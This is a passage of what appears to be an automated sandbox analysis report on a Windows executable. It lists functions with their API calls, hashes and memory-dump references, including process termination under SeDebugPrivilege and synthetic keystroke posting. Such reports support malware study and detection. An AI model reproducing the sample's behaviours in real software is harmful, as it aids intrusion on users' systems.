                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                              • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                              • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                              • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                              Function 02F51A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 02F51A3E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: DecodePointer
                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                              • API String ID: 3527080286-3064271455
                                                                              • Opcode ID: d863527aeb9731c7e5306ab30153aa2dd9aa1dbeaecc665f4d69bdafe21087d7
                                                                              • Instruction ID: d1e04d163ae1afb6aecbf0e3eb932540c18bc771199ca803d31c2d7759805ee4
                                                                              • Opcode Fuzzy Hash: d863527aeb9731c7e5306ab30153aa2dd9aa1dbeaecc665f4d69bdafe21087d7
                                                                              • Instruction Fuzzy Hash: 0C517071E0092ADBDF109F68DA4C6EFBBB0FF49394F100185DB89A7254DB35A924CB64
                                                                              Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                              • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                              • String ID:
                                                                              • API String ID: 560350794-0
                                                                              • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                              • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                              • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                              • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                              Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0047F6B5
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                                                              • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                                                              • CloseHandle.KERNEL32(?), ref: 0047FB22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                              • String ID:
                                                                              • API String ID: 4090791747-0
                                                                              • Opcode ID: d19b129d984be36d3a078d17f6a4549c2e0840106d9fd9193167eaff5074c24f
                                                                              • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                                                              • Opcode Fuzzy Hash: d19b129d984be36d3a078d17f6a4549c2e0840106d9fd9193167eaff5074c24f
                                                                              • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                                                              Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                              • _wcscmp.LIBCMT ref: 00464D5A
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 793581249-0
                                                                              • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                              • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                              • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                              • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                              Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                              • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                              • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                              • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                              Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                              • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                              • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                              • String ID:
                                                                              • API String ID: 2819616528-0
                                                                              • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                              • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                              • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                              • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                              Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                                                                • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                                                                • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                              • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                                                              • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                              • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                                                              Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                              • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                              • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                              • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                              • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                              • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                              • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                              • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                              • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                              Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                                                              • _memset.LIBCMT ref: 00479813
                                                                              • _memset.LIBCMT ref: 00479956
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047998D
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 004799DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                              • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                                                              • Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                              • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                                                              Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                              • _wcscat.LIBCMT ref: 00486EAD
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                              • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                              • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                              • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                              Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                              • GetLastError.KERNEL32 ref: 0047E9B7
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                              • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                              • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                              • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                              • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                              Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
